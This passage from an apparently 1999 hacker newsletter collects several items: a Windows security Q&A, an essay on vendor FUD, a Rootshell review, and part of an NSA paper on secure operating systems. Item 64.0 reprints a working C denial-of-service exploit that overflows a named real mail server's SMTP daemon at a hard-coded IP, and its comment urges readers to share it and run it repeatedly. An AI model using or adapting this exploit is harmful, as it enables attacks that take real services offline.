Inc.] of the Internet," Noonan said. "And we might as well lay claim to that."
@HWA
62.0 Backdoors in Windows?
~~~~~~~~~~~~~~~~~~~~~
Are there "back doors" in Windows 95 and 98, where hackers on the Internet can get info from your PC?
-- Louis from Seaside Heights
ZDTV
It is possible for hackers to get to your computer if you share hard drives or have a static IP address.
At Rootshell (http://www.rootshell.com, ICSA (http://www.icsa.net, and the Computer Emergency Response Team (http://www.cert.org, you can learn about how
people do this on Windows 95. These are very useful webpages for security problems. You may also want to check out such newsgroups as comp.risks.
If you use a dial-up connection, your computer's IP address will not stay the same, so hackers will have a hard time locating it. However, computers that use a cable
modem or network access with a static IP address are a little bit easier to hack.
You shouldn't be too paranoid, though: Evil hackers are mostly concerned with banks, the Pentagon, and keeping Babylon 5 on the air, not what you have on your
personal PC.
At any rate, see below for a list of links with information about online security.
Rootshell
http://www.rootshell.com
Computer Emergency Response Team
http://www.cert.org
The US Department of Energy's Computer Incident Advisory Capability
http://ciac.llnl.gov
ICSA
http://www.icsa.net
DigiCrime (it's harmless, we promise!)
http://www.digicrime.com/dc.html
@HWA
63.0 The NewbiesThe Newbie's Guide to Fear, Uncertainty, and Doubt
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From Buffer Overflow on HNN http://www.hackernews.com/
By: Brian Martin
Introduction
Fear, Uncertainty and Doubt (FUD). We all live with it, and
we're all accustomed to it at one level or another: "Do I
have enough insurance?"; "Did I leave the coffee pot on
when I left for work this morning?"; "Will my proposal be
accepted by management?" FUD is simply a facet of life;
something with which we all must contend to the best of
our abilities.
FUD is yet another method often employed by a party
(typically a vendor in our context) to help propogate their
product or service. In short, this is acheived by
attempting to instill a sense of fear, uncertainty or doubt
in the minds of consumers regarding a competitor's
product. By instilling FUD in the minds of consumers, the
vendor obliquely promises dire consequences if the
intended target does not buy their goods.
The obvious fallacy with this approach is that a vendor's
product or service (P&S) is not sold on it's own merit;
rather it is sold as a "reasonable alternative". FUD's
primary goal is to scare consumers away from using
superior P&S in favor of inferior (yet often more
recognized) P&S.
According to the New Hackers Dictionary (aka the Jargon
file), FUD is defined as: FUD /fuhd/ n.
Defined by Gene Amdahl after he left IBM to found his own
company: "FUD is the fear, uncertainty, and doubt that
IBM sales people instill in the minds of potential customers
who might be considering [Amdahl] products." The idea, of
course, was to persuade them to go with safe IBM gear
rather than with competitors' equipment. This implicit
coercion was traditionally accomplished by promising that
Good Things would happen to people who stuck with IBM,
but Dark Shadows loomed over the future of competitors'
equipment or software. See IBM. After 1990 the term FUD
was associated increasingly frequently with Microsoft, and
has become generalized to refer to any kind of
disinformation used as a competitive weapon. (1)
The past few years have brought a dramatic increase in
the FUD tactic. Not only are large companies using it to
help stifle new and upcoming competition, in addition,
uneducated journalists are wielding it like a four year old
with a loaded gun: unaware of the danger, or of the
consequences.
The use of FUD in a marketing campaign is often subtle
and hard to spot. Well written FUD will blend in among
facts and be difficult to discern. Worse, this underhanded
tactic is often problematic in trying to counter. Rather
than fighting against incorrect facts or misguided opinions,
you find yourself battling vague assertions, self-serving
maxims, and half-truths.
Worse yet is spotting the FUD campaign in the first place.
Because it is an effective weapon based on half-truths,
distinguishing it from legitimate opinion may be difficult.
For an excellent paper and well documented examples of
this, consult the paper titled 'FUD 101'. (2) In this
document, Mr. Green outlines several elements and
examples of Microsoft using a FUD campaign against the
Linux Community.
In today's world of articles and press releases, we can
identify several levels of FUD. This is important as it tells
us how to respond to the 'news'. The more FUD, the more
skepticism that should be given to it. The less FUD, the
better the chance it was just uneducated conclusions
that lead to the text.
Twelve Elements of FUD
To help newcomers to the world of FUD, I have come up
with a list of twelve elements that can and are used. In
order to make this even easier for the consumer, I have
devised a scale to help qualify the 'FUD level' used in a
particular piece of writing. While this delineation is by no
means an exact science, it can help put into perspective
the subtle technique of disinformation.
a) Urgency
1) Buy our product now to avoid headache tomorrow!
While this may be appealing initially, this often comes at
the sacrifice of features or performance. Yes, it may be
easy to use, but odds are it does a third of what
competitor's products do.
2) Buy our product now because tomorrow our product will
kick ass!
The promise of future development (also known as
'vaporware') encourages you to purchase the product now
in order to receive future upgrades that will be better
than what is on the market now. Obviously, this does
nothing but hurt you in the here and now.
b) Supporters
3) No quoted names.
In this world of technology professionals, it is easy to find
someone who is a) qualified, b) supportive of the product
and c) willing to go on the record. Anytime an article
comes out that claims a P&S is desired or supported, but
lacks names to back those claims, should be questioned.
Why couldn't they find at least one person to go on
record endorsing the product?
4) Quoting known frauds and charlatans.
Worse than quoting no one is to quote frauds. Rather than
not finding someone to endorse a P&S, they had to turn
to someone that is well known for NOT knowing
technology. These people will often go on the record
endorsing anything if it propogates their name or
company, or leads to them receiving some kind of
incentive (read: cash).
c) Technical
5) Epiphany Nomenclature Significance Naught (3)
The use of large or fancy words in place of readily
understood technical terms. Obscuring features behind
words that sound impressive is a common way of hiding
the truth. This technique is often known as 'buzzword
compliance'.
6) Hyping up old or standard features in place of current
or impressive technology.
We all use and trade email, so a company drooling over
themselves in light of their amazing use of the SMTP (4)
protocol means very little.
d) Harm
7) Without our P&S, you'll be hacked!
New security and crypto based companies are fond of
using this ploy. Without their products, you are a time
bomb waiting to go off! Come tomorrow, evil and malicious
hackers will intrude upon your network, deface your web
page, read your corporate secrets and pour sand in your
gas tank!
8) Without our P&S, you will not get future business!
The trend of business is moving toward our product and
what we deem standardizations! If you and your company
don't jump on our bandwagon, no other company will do
business with you! As we all know, new technology and
new standards are only adopted after long and rigorous
testing. To move over to a new platform or protocol
simply because some companys says so is ludicrous.
9) Without our P&S, you will lose time and money!
This varies slightly from #2 in that the FUD centers around
your company losing time and money today, not
tomorrow. As we all know, any enterprise outfit that could
possibly lose money in a matter of days without a specific
product not already implemented is doomed to begin with.
e) Spin Doctoring (2)
10) Hyping opponent's weakness
No more than a form of mudslinging, the company doesn't
rely on its own merit to pursuade you to use their
products. Rather, they must display their opponents
weaknesses and use them to convince you not to use
theirs.
11) Creating weaknesses for the opponent
Sometimes an opponent has very few weaknesses. So,
why not make some up? Clever wording and sometimes
outright lies lead to one company creating supposed
weaknesses in competitors P&S.
12) Attacking opponent's strengths
Akin to #1, this relies on attacking the selling points of a
competitor's P&S. Often times, you will see this used in
conjunction with #1 to attempt to completely belittle the
opposing P&S.
For fun and amusement, you can use the twelve points
above to rate articles. If an article or press release uses
some of the methods above, attribute it one point per
method. In the end, you can say that a given article has
a "FUD Factor of 4" or rated "7 on the FUD scale". Recent
months have shown Microsoft to be repeat offenders,
often rating between 5 and 10 on the FUD Scale. Their
fear of the Linux operating system shows. No one should
ever rate higher than a 10, unless the article is made up
of nothing but FUD.
Response to FUD
As with all problems, it does little good to discuss them
without proposed solutions. With FUD, it is much more
manageable and easy to deal with.
The first thing is recognizing FUD in all its forms.
Awareness for the average person is the tricky part.
Consider the average person that has an interest in the
ever changing world of technology and networking. They
go day to day without the benefit of forums that readily
challenge these huge companies oozing FUD at every
crevice. Unfortunately, they are a bulk of the customers
and supporters of these P&S. Educating them is the first
step toward an honest profession.
Second, is the response. Even if you do recognize a
company peddling FUD, how do you respond? Very simple.
1) Mail the author of the FUD as well as their editor. When
doing so, be polite and present facts to back your mail.
Site reference material, URLs or anything solid to back
your argument and counter theirs.
2) Once mailed, give them a chance to correct their
mistakes. Do not assume the FUD was intentional. The
correction can come in the form of a retraction or followup
article. As much as I hate to say it, the media machine
may not allow for either. At that point, you must decided
what to do.
3) Openly dispute the article in a public forum. Be it a mail
list or web board, post the relevant parts of the article
containing the FUD and refute them with your own facts.
This causes a bit more strife but may be the only solution.
Fin The use of Fear, Uncertainty, and Doubt in marketing
campaigns -- while certain to get the public's attention --
is plainly wrong. Armed with the above information, it's our
hope that the reader will now be able to spot it, refute it,
and most importantly, not buy into it.
Brian Martin
Copyright 1999 Brian Martin
References
(1) Entry for FUD in the Jargon File
(2) Eric Green (eric@linux-hw.com) for his paper 'FUD
101'. An excellent resource for real world examples and
definitions.
http://members.tripod.com/~e_l_green/fud101-4.html
(3) By using standard synonyms from
www.dictionary.com, we can create an alternate phrase
that sounds impressive, yet means nothing. Fancy ->
Epiphany, Words -> Nomenclature, Meaning ->
Significance, Nothing -> Naught. "Fancy words meaning
nothing".
(4) SMTP stands for Simple Mail Transfer Protocol. The
existing protcol that has been delivering your e-mail for
over a decade.
Thanks Space Rogue (spacerog@l0pht.com) for the idea
of this paper and harassment.
ATTRITION Staff (staff@attrition.org) for peer review and
harassment.
Anna Henricks, Geekgrl, and especially Jay Dyson for proof
reading and suggestions.
@HWA
64.0 Crashing AntiOnline's SMTP server?
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From http://www.innerpulse.com/
Crash AntiOnline SMTP Server?
Contributed by siko
Tuesday - August 10, 1999. 09:17PM UTC
An anonymous contributor submitted source code that is supposed to crash
AntiOnline's SMTP/pop3 servers. This is unconfirmed and not supported by
Innerpulse staff. (ditto for HWA staff =),- Ed)
anti-smtp.c
/*
* This simple peice of code will exploit one of the many buffer overflow problems
* with the SMTP/POP3 daemon software on the Antionline mail server, causing a denial of
* service. I'm sure there are much more serious problems which could be caused,
* if you know what I mean. Give this to everyone you know. Tell them to run it
* over and over. Maybe that will convince JP to fix this, because it's been around
* for months and months, and he's been notified of it more than once. I wish I
* didn't have to do this.
*
* Cheers,
*
* -- jbx
*/
#include <stdio.h>
#include <errno.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <sys/types.h>
#include <sys/socket.h>
char arg1[] = "vrfy ";
char *sendbuffer;
#define CHARACTERS_TO_SEND 475
int main(void) {
int thesocket;
int counter = 0;
struct sockaddr_in foonet;
foonet.sin_port = htons(25);
foonet.sin_family = AF_INET;
foonet.sin_addr.s_addr = inet_addr("209.166.177.36");
// foonet.sin_addr.s_addr = inet_addr("127.0.0.1");
sendbuffer = (char *)malloc(1000);
if((thesocket = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
perror("Error creating socket");
exit(1);
}
printf("Connecting to the server...\n");
if(connect(thesocket, (struct sockaddr *)&foonet, sizeof(struct sockaddr)) == -1) {
if(errno == ECONNREFUSED) {
printf("Connection refused. Most likely someone else has crashed it already.\n");
exit(1);
}
perror("Unable to connect");
exit(1);
}
sprintf(sendbuffer, arg1);
while(counter != CHARACTERS_TO_SEND) {
strcat(sendbuffer, "x");
counter++;
}
strcat(sendbuffer, "\r\n");
write(thesocket, "helo localhost\r\n", 16);
sleep(2);
printf("Sending the string...\n");
write(thesocket, sendbuffer, strlen(sendbuffer));
close(thesocket);
printf("Done. The service is now toast, and although it may still accept connections,\nit's not working.\n");
}
@HWA
65.0 Rootshell.com review
~~~~~~~~~~~~~~~~~~~~
http://www.techsightings.com/cgi-bin/ts_review.pl?52
Hackers and Crackers Go Mainstream
Wednesday - 26/Aug/1998 by Robin Miller
Since Rootshell went online in mid-1997, I
thought of it as a premier hacker/cracker site
where break-in exploits (with detailed scripts) got posted for use by
others who enjoy this game. But as of August 1998, it's a "Network
Security Information Site."
I'm sure many professional network security people already read
Rootshell at least once a week. More should. Despite its surface
turnabout, it's still full of security bug findings, usually with detailed
instructions on how to exploit them. Indeed, several Pentagon officials
have blamed Rootshell for some of the kid-type hack attempts made
against some DoD sites in late 1997 and early 1998.
But not everyone in our military establishment is braindead, and by the
time the kiddies who follow Rootshell were trying the "Hack the
Pentagon" scripts they found there, defenses had been erected -- and
all their attempts failed.
Rootshell is platform-agnostic. Bug reports and security flaws listed
here cover UNIX, Windows and NT, Mac, Linux, FreeBSD, Solaris, and
everything else that pops up. There's a mailing list (outbound only, low
volume) that keeps you up to date on new info and news, and is well
worth subscribing to if you have any interest -- from either direction -- in
computer and network security.
One last note: Rootshell, even in its new incarnation, still contains this
disclaimer, and I'd personally appreciate it if you read and follow it.
"By using this site you agree you will use the information on this site for
lawful purposes only and will not use this information to gain
unauthorized access. Information on this site is for educational
purposes ONLY. If you do not agree with this, please leave now."
Check it out
http://www.rootshell.com/
@HWA
66.0 The inevitability of failure.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
17 December 1998: Stephen Smalley notes: The slides and notes from our presentation at the NISSC for this paper are available at:
http://www.cs.utah.edu/~sds/inevit-abs.html.
14 November 1998
Source: http://csrc.nist.gov/nissc/1998/proceedings/paperF1.pdf (62K)
Full list of NISSC 98 papers: http://csrc.nist.gov/nissc/1998/papers.html (Link fixed). Thanks to JM/RH.
The Inevitability of Failure:
The Flawed Assumption of
Security in Modern
Computing Environments
Peter A. Loscocco, Stephen D. Smalley,
Patrick A. Muckelbauer, Ruth C. Taylor,
S. Jeff Turner, John F. Farrell
tos@epoch.ncsc.mil
National Security Agency
CONTENTS
Abstract
1 Introduction
2 The Missing Link
Mandatory Security
Trusted Path
3 General Examples
3.1 Access Control
3.2 Cryptography
4 Concrete Examples
4.1 Mobile Code
4.2 Kerberos
4.3 Network Security Protocols
4.4 Firewalls
5 System Security
6 Summary
7 References
[Contents added to original]
Abstract
Although public awareness of the need for security in computing systems is growing rapidly, current efforts to provide security are unlikely to succeed. Current security
efforts suffer from the flawed assumption that adequate security can be provided in applications with the existing security mechanisms of mainstream operating systems.
In reality, the need for secure operating systems is growing in today�s computing environment due to substantial increases in connectivity and data sharing. The goal of
this paper is to motivate a renewed interest in secure operating systems so that future security efforts may build on a solid foundation. This paper identifies several
secure operating system features which are lacking in mainstream operating systems, argues that these features are necessary to adequately protect general
application-space security mechanisms, and provides concrete examples of how current security solutions are critically dependent on these features.
Keywords: secure operating systems, mandatory security, trusted path, Java, Kerberos, IPSEC, SSL, firewalls.
1 Introduction
Public awareness of the need for security in computing systems is growing as critical services are becoming increasingly dependent on interconnected computing
systems. National infrastructure components such as the electric power, telecommunication and transportation systems can no longer function without networks of
computers [50]. The advent of the World Wide Web has especially increased public concern for security. Security is the primary concern of businesses which want to
use the Internet for commerce and maintaining business relationships [24].
The increased awareness of the need for security has resulted in an increase of efforts to add security to computing environments. However, these efforts suffer from
the flawed assumption that security can adequately be provided in application space without certain security features in the operating system. In reality, operating system
security mechanisms play a critical role in supporting security at higher levels. This has been well understood for at least twenty five years [2][54][39], and continues to
be reaffirmed in the literature [1][35]. Yet today, debate in the research community as to what role operating systems should play in secure systems persists [11]. The
computer industry has not accepted the critical role of the operating system to security, as evidenced by the inadequacies of the basic protection mechanisms provided
by current mainstream operating systems.
The necessity of operating system security to overall system security is undeniable; the underlying operating system is responsible for protecting application-space
mechanisms against tampering, bypassing, and spoofing attacks. If it fails to meet this responsibility, system-wide vulnerabilities will result.
The need for secure operating systems is especially crucial in today�s computing environment. Substantial increases in connectivity and data sharing have increased the
risk to systems such that even a careful and knowledgeable user running on a single-user system is no longer safe from the threat of malicious code. Because the
distinction between data and code is vanishing, malicious code may be introduced, without a conscious decision on the part of a user to install executable code, whenever
data is imported into the system. For example, malicious code could be introduced with a Java applet or by viewing apparently benign data that, in actuality, contains
executable code [32][62]. More so than ever, secure operating systems are needed to protect against this threat.
The goal of this paper is to motivate a renewed interest in secure operating systems. By consolidating a number of well-documented examples from the literature, it
argues that the threats posed by the modern computing environment cannot be addressed without support from secure operating systems and, as was stated in [8], that
any security effort which ignores this fact can only result in a �fortress built upon sand.� Section 2 describes a set of secure operating system features which are
typically lacking in mainstream operating systems but are crucial to information security. The need for these features is highlighted in section 3, which examines how
application-space access control and cryptography cannot provide meaningful security without a secure operating system. Section 4 provides concrete examples of how
security efforts rely on these operating system security features. Section 5 discusses the role of operating system security with respect to overall system security.
2 The Missing Link
This section identifies some features of secure operating systems which are necessary to protect application-space security mechanisms yet are lacking in mainstream
operating systems. They form the �missing link� of security. Although this section only deals with features, it is important to note that features alone are inadequate.
Assurance evidence must be provided to demonstrate that the features meet the desired system security properties and to demonstrate that the features are
implemented correctly. Assurance is the ultimate missing link; although approaches to providing assurance may be controversial, the importance of assurance is
undeniable.
The list of features in this section is not intended to be exhaustive; instead it is merely a small set of critical features that demonstrate the value of secure operating
systems. A more complete discussion on secure operating systems, including discussions of assurance, can be found in [25], [59] or [20]. Subsequent sections argue the
necessity of these features by describing how application-space security mechanisms and current security efforts employing them are vulnerable in their absence.
Mandatory security
The TCSEC [20] provides a narrow definition of mandatory security which is tightly coupled to the multi-level security policy of the Department of Defense. This has
become the commonly understood definition for mandatory security. However, this definition is insufficient to meet the needs of either the Department of Defense or
private industry as it ignores critical properties such as intransitivity and dynamic separation of duty [12][22]. This paper instead uses the more general notion of
mandatory security defined in [59], in which a mandatory security policy is considered to be any security policy where the definition of the policy logic and the
assignment of security attributes is tightly controlled by a system security policy administrator. Mandatory security can implement organization-wide security policies.
Others have referred to this same concept as non-discretionary security in the context of role-based access control [22] and type enforcement [39][7][13].1
___________________
1. Actually, long ago, the term non-discretionary controls was used for multi-level security as well [39].
Likewise, as defined in [59], this paper uses a more general notion of discretionary security in which a discretionary security policy is considered to be any security
policy where ordinary users may be involved in the definition of the policy functions and/or the assignment of security attributes. Here discretionary security is not
synonymous with identity based access control; IBAC, like any other security policy, may be either mandatory or discretionary[58].
An operating system�s mandatory security policy may be divided into several kinds of policies, such as an access control policy, an authentication usage policy, and a
cryptographic usage policy. A mandatory access control policy specifies how subjects may access objects under the control of the operating system. A mandatory
authentication usage policy specifies what authentication mechanisms must be used to authenticate a principal to the system. A mandatory cryptographic usage policy
specifies what cryptographic mechanisms must be used to protect data. Additionally, various sub-systems of the operating system may have their own mechanism usage
policies. These subsystem-specific usage policies may be dependent on the cryptographic usage policy. For example, a network usage policy for a router might specify
that sensitive network traffic should be protected using IPSEC ESP [4] in tunneling mode prior to being sent to an external network. The selection of a cryptographic
algorithm for IPSEC ESP may be deferred to the cryptographic usage policy.
A secure system must provide a framework for defining the operating system�s mandatory security policy and translating it to a form interpretable by the underlying
mandatory security mechanisms of the operating system. Without such a framework, there can be no real confidence that the mandatory security mechanisms will
provide the desired security properties. An operating system which provides mandatory security may nonetheless suffer from the presence of high bandwidth covert
channels. This is an issue whenever the mandatory security policy is concerned with confidentiality. This should not, however, be a reason to ignore mandatory security.
Even with covert channels, an operating system with basic mandatory controls improves security by increasing the required sophistication of the adversary. Once
systems with basic mandatory controls become mainstream, covert channel exploitation will become more common and public awareness of the need to address covert
channels in computing systems will increase[57].
In any system which supports mandatory security, some applications require special privileges in the mandatory policy in order to perform some security-relevant
function. Such applications are frequently called trusted applications because they are trusted to correctly perform some security-related function and because they are
trusted to not misuse privileges required in order to perform that function. If the mandatory security mechanisms of a secure operating system only support
coarse-grained privileges, then the security of the overall system may devolve to the security of the trusted applications on the system. To reduce the dependency on
trusted applications, the mandatory security mechanisms of an operating system should be designed to support the principle of least privilege. Type enforcement is an
example of a mandatory security mechanism which may be used both to limit trusted applications to the minimal set of privileges required for their function and to
confine the damage caused by any misuse of these privileges [48][28].
The mandatory security mechanisms of an operating system may be used to support security-related functionality in applications by rigorously ensuring that subsystems
are unbypassable and tamperproof. For example, type enforcement may be used to implement assured pipelines to provide these properties. An assured pipeline ensures
that data flowing from a designated source to a designated destination must pass through a security-related subsystem and ensures the integrity of the subsystem. Many
of the security requirements of these applications may be ensured by the underlying mandatory security mechanisms of the operating system. [48]
Operating system mandatory security mechanisms may also be used to rigorously confine an application to a unique security domain that is strongly separated from other
domains in the system. Applications may still misbehave, but the resulting damage can now be restricted to within a single security domain. This confinement property is
critical to controlling data flows in support of a system security policy [33]. In addition to supporting the safe execution of untrustworthy software, confinement may
support functional requirements, such as an isolated testing environment or an insulated development environment [48]. For example both the Sidewinder firewall and the
DTE firewall use type enforcement for confinement [6][12].
Although one could attempt to enforce a mandatory security policy through discretionary security mechanisms, such mechanisms can not defend against careless or
malicious users. Since discretionary security mecha-nisms place the burden for security on the individual users, carelessness by any one user at any point in time may
lead to a violation of the mandatory policy. In con-trast, mandatory security mechanisms limit the burden to the system security policy administrator. With only
discretionary mechanisms, a malicious user with access to sensitive data and applications may directly release sensitive information in violation of the mandatory policy.
Although that same user may also be able to leak sensitive information in ways that do not involve the computing system, the ability to leak the information through the
computing system may increase the bandwidth of the leak and may decrease its traceability. In contrast, with mandatory security mechanisms, he may only leak
sensitive information through covert channels, which limits the bandwidth and increases accountability, if covert channels are audited.
Furthermore, even with users who are benign and careful, the mandatory security policy may still be subverted by flawed or malicious applications when only
discretionary mechanisms are used to enforce it.2 The distinction between flawed and malicious software is not particularly important in this paper. In either case, an
application may fail to apply security mechanisms required by the mandatory policy or may use security mechanisms in a way that is inconsistent with the user�s intent.
Mandatory security mechanisms may be used to ensure that security mechanisms are applied as required and can protect the user against inadvertent execution of
untrustworthy applications. Although the user may have carefully defined the discretionary policy to properly implement the mandatory policy, an application may change
the discretionary policy without the user�s approval or knowledge. In contrast, the mandatory policy may only be changed by the system security policy administrator.
_________________
2. A discussion of the formal limitations of discretionary security mechanisms appears in [29].
In the case of personal computing systems, where the user may be the system security policy administrator, mandatory security mechanisms are still helpful in
protecting against flawed or malicious software. In the simplest case, where there is only a distinction between the user�s ordinary role and the user�s role as system
security policy administrator, the mandatory security mechanisms can protect the user against unintentional execution of untrustworthy software. With a further
sub-division of the user�s ordinary role into various roles based on function, mandatory security mechanisms can confine the damage that may be caused by flawed or
malicious software.
Although there are a number of commercial operating systems with support for mandatory security, none of these systems have become mainstream. These systems
have suffered from a fixed notion of mandatory security, thereby limiting their market appeal. Furthermore, these systems typically lack adequate support for
constraining trusted applications. In order to reach a wider market, operating systems must support a more general notion of mandatory security and must support
flexible configuration of mandatory policies.
Mainstream commercial operating systems rarely support the principle of least privilege even in their discretionary access control architecture. Many operating systems
only provide a distinction between a completely privileged security domain and a completely unprivileged security domain. Even in Microsoft Windows NT, the privilege
mechanism fails to adequately protect against malicious programs because it does not limit the privileges that a program inherits from the invoking process based on the
trustworthiness of the program [65].
Current microkernel-based research operating systems have tended to focus on providing primitive protection mechanisms which may be used to flexibly construct a
higher-level security architecture. Many of these systems, such as the Fluke microkernel [23] and the Exokernel [41], use kernel-managed capabilities as the underlying
protection mechanism. However, as discussed in [59], typical capability architectures are inadequate for supporting mandatory access controls with a high degree of
flexibility and assurance. L4 [38] provides some support for mandatory controls through its clans and chiefs mechanism and its IPC mechanism for identifying senders
and receivers but still lacks a coherent framework for using these mechanisms to meet the requirements of a mandatory policy. Furthermore, L4 assumes that there will
only be a small number of distinct security domains [38]. Flask [56], a variant of the Fluke microkernel, provides a mandatory security framework similar to that of
DTOS [43], a variant of the Mach microkernel; both systems provide mechanisms for mandatory access control and a mandatory policy framework.
Trusted path
A trusted path is a mechanism by which a user may directly interact with trusted software, which can only be activated by either the user or the trusted software and
may not be imitated by other software [20]. In the absence of a trusted path mechanism, malicious software may impersonate trusted software to the user or may
impersonate the user to trusted software. Such malicious software could potentially obtain sensitive information, perform functions on behalf of the user in violation of
the user�s intent, or trick the user into believing that a function has been invoked without actually invoking it. In addition to supporting trusted software in the base
system, the trusted path mechanism should be extensible to support the subsequent addition of trusted applications by a system security policy administrator [28].
The concept of a trusted path can be generalized to include interactions beyond just those between trusted software and users. The TNI introduces the concept of a
trusted channel for communication between trusted software on different network components [44]. More generally, a mechanism that guarantees a mutually
authenticated channel, or protected path, is necessary to ensure that critical system functions are not being spoofed. Although a protected path mechanism for local
communications could be constructed in application space without direct authentication support in the operating system, it is preferable for an operating system to provide
its own protected path mechanism since such a mechanism will be simpler to assure [59] and is likely to be more efficient.
Most mainstream commercial operating systems are utterly lacking in their support for either a trusted path mechanism or a protected path mechanism. Microsoft
Windows NT does provide a trusted path for a small set of functions such as login authentication and password changing but lacks support for extending the trusted path
mechanism to other trusted applications [65]. For local communications, NT does provide servers with the identity of their clients; however, it does not provide the server
identity to the client.
3 General Examples
This section argues that without operating system support for mandatory security and trusted path, application-space mechanisms for access control and cryp-tography
cannot be implemented securely. These arguments will then be used to reinforce the discussion in section 4, which analyzes concrete examples.
3.1 Access Control
An application-space access control mechanism may be decomposed into an enforcer component and a decider component. When a subject attempts to access an
object protected by the mechanism, the enforcer component must invoke the decider component, supplying it with the proper input parameters for the policy decision,
and must enforce the returned decision. A common example of the required input parameters is the security attributes of the subject and the object. The decider
component may also consult other external sources in order to make the policy decision. For example, it may use an external policy database and system information
such as the current time.
If a malicious agent can tamper with any of the components in the access control mechanism or with any inputs to the decision, then the malicious agent can subvert the
access control mechanism. Even if the components and all of the inputs are collocated within a single file, the operating system security mechanisms are still relied upon
to protect the integrity of that file. As discussed in the prior section, only mandatory security mechanisms can rigorously provide such integrity guarantees.
Even with strong integrity guarantees for the policy decision inputs, if an authorized user invokes malicious software, the malicious software could change an object�s
security attributes or the policy database�s rules without the user�s knowledge or consent. The access control mechanism requires a trusted path mechanism in the
operating system in order to ensure that arbitrary propagation of access cannot occur without explicit authorization by a user.
If a malicious agent can impersonate the decider component to the enforcer component, or if a malicious agent can impersonate any source of inputs to the decision,
then the malicious agent can subvert the mecha-nism. If any of the components or external decision input sources are not collocated within a single application, then the
access control mechanism requires a protected path mechanism.
If a malicious agent can bypass the enforcer component, then it may trivially subvert the access control mechanism. Mandatory security mechanisms in the operating
system may be used to ensure that all accesses to the protected objects are mediated by the enforcer component.
3.2 Cryptography
An analysis of application-space cryptography may be decomposed into an analysis of the invocation of the cryptographic mechanism and an analysis of the
cryptographic mechanism itself. The analysis of this section draws from the discussions in [51][15] [60][61][55][52].
As an initial basis for discussion, suppose that the cryptographic mechanism is a hardware token that implements the necessary cryptographic functions correctly and
that there is a secure means by which the cryptographic keys are established in the token. Even in this simplified case, where the confidentiality and integrity of
algorithms and keys is achieved without operat-ing system support, this section will demonstrate that there are still vulnerabilities which may only be effectively
addressed with the features of a secure operating system.
One vulnerability in this simplified case is that invocation of the token cannot be guaranteed. Any legitimate attempt to use the token might not result in a call to the
token. The application that performs the cryptographic invocation might be bypassed or modified by malicious applications or malicious users. Malicious applications
might impersonate the cryptographic token to the invoking application.
Mandatory security and protected path features in the operating system address this vulnerability. Mandatory security mechanisms may be used to ensure that the
application that invokes the cryptographic token is unbypassable and tamperproof against both malicious software and malicious users. Unbypassability could also be
achieved by using an inline cryptographic token, which is physically interposed between the sender of the data to be protected and the receiver of the protected data;
however, this would be less flexible. A protected path mechanism may be used to ensure that malicious software cannot impersonate the cryptographic token to the
invoking application.
Misuse of the cryptographic token is a second vulnerability in the simplified case. Misuse may involve the use of a service, algorithm, session or key by an unauthorized
application. Without operating system support for identifying callers, a cryptographic token can do little more than require that a user activate it, after which, any service,
algorithm, session or key authorized for that user may be used by any application on the system. In this case, the cryptographic token may be misused by applications
operating on behalf of other users or may be misused by malicious software operating on behalf of the authorized user. Furthermore, unless the cryptographic token has
a direct physical interface for user activation, malicious software can spoof the token to the user, obtain authentication information, and subsequently activate the
cryptographic token without the user�s knowledge or consent. Even with a direct physical interface to the user, it is impractical for the cryptographic token to require
user confirmation for every cryptographic operation.
This second vulnerability may be addressed through mandatory security, trusted path and protected path features in the operating system. A trusted path mechanism
obviates the need for a separate physical interface for activation. A protected path mechanism permits the cryptographic token to identify its callers and enforce
fine-grained controls over the use of services, algorithms, sessions and keys. As an alternative to having the token deal with fine-grained controls over its usage,
mandatory security mechanisms may also be used to provide such controls. For example, mandatory security mechanisms may be used to isolate the token for use only
by applications executed by the user who activated the token. Furthermore, the mandatory security mechanisms can reduce the risk of malicious software being able to
use the cryptographic token and may consequently limit the use of the trusted path mechanism to highly sensitive actions.
Hence, even in the simplest case, the features of a secure operating system are crucial to addressing the vulnerabilities of application-space cryptography. In the
remainder of this section, the assumptions of the simplified case are removed, and the additional vulnerabilities are examined.
If the assumption that initial keys are securely established within the token is removed, then there is the additional vulnerability that the initial keys may be observed or
modified by an unauthorized entity. Unless the initial keys are provided via a dedicated physical interface to the cryptographic token, the operating system must protect
the path between the initial key source and the cryptographic token and may need to protect the initial key source itself. Mandatory security mechanisms may be used to
rigorously protect the path and the key source. A trusted path may be required for initial keying.
If the assumption that the cryptographic mechanism is confined to a single hardware token is removed and implemented in software instead, the confidentiality and
integrity of the cryptographic mechanism�s code and data becomes dependent on the operating system, including both memory protection and file protection. Mandatory
security is needed to rigorously ensure the mechanism�s integrity and confidentiality. If any external inputs, such as input parameters to a random number generator, are
used by the cryptographic mechanism, the input sources and the path between the input sources and the cryptographic mechanism must be protected with mandatory
security mechanisms.
4 Concrete Examples
This section further demonstrates that secure operating systems are necessary by showing that some widely accepted security solutions critically rely on the features of
secure operating systems. In particular, this section examines mobile code security efforts, the Kerberos network authentication system, firewalls and network security
protocols.
4.1 Mobile Code
A number of independently-developed security solutions for the World Wide Web, each with its own protection model, have been developed to protect against the
threats from malicious mobile code. However, systems relying on these security solutions are vulnerable because of a lack of operating system support for security.
Primarily, this section will emphasize this point by focusing on efforts to secure Java [27], but other efforts will also be used to highlight issues.
The primary threat that these solutions attempt to address is the threat of hostile mobile code gaining unauthorized access to a user�s files and resources in order to
compromise confidentiality or integrity. The threat is not limited to interpreted applets loaded from the network by a web browser; both [26] and [30] extend this threat
model to include helper applications which may have been actively installed by a user. There is little distinction between mobile code and what is traditionally considered
data. For example, consider that Postscript documents are actually programs with potential access to the local filesystem. Consequently, helper applications which
operate on untrustworthy data, such as Postscript viewers, must either be executed in a less flexible mode of operation, or must be carefully confined by the operating
system.
The basic Java Security Model is based on the notion of �sandboxing.� The system relies on the type-safety of the language in conjunction with the Java Security
Manager to prevent unauthorized actions [27]. Efforts are currently underway to add additional security features to Java, such as capabilities, an expanded access
control model, or additional controls over access to certain class libraries [70].
The fundamental limitation of these approaches is that none can be guaranteed to be tamperproof or unbypassable. For example, although the Java language is claimed
to be secure, the Java Virtual Machine (JVM) will accept byte code which violates the language semantics and which can lead to security violations [32]. JVM
implementation errors have led to violations of the language�s semantics [19]. A significant portion of the Java system is currently in the form of native methods which
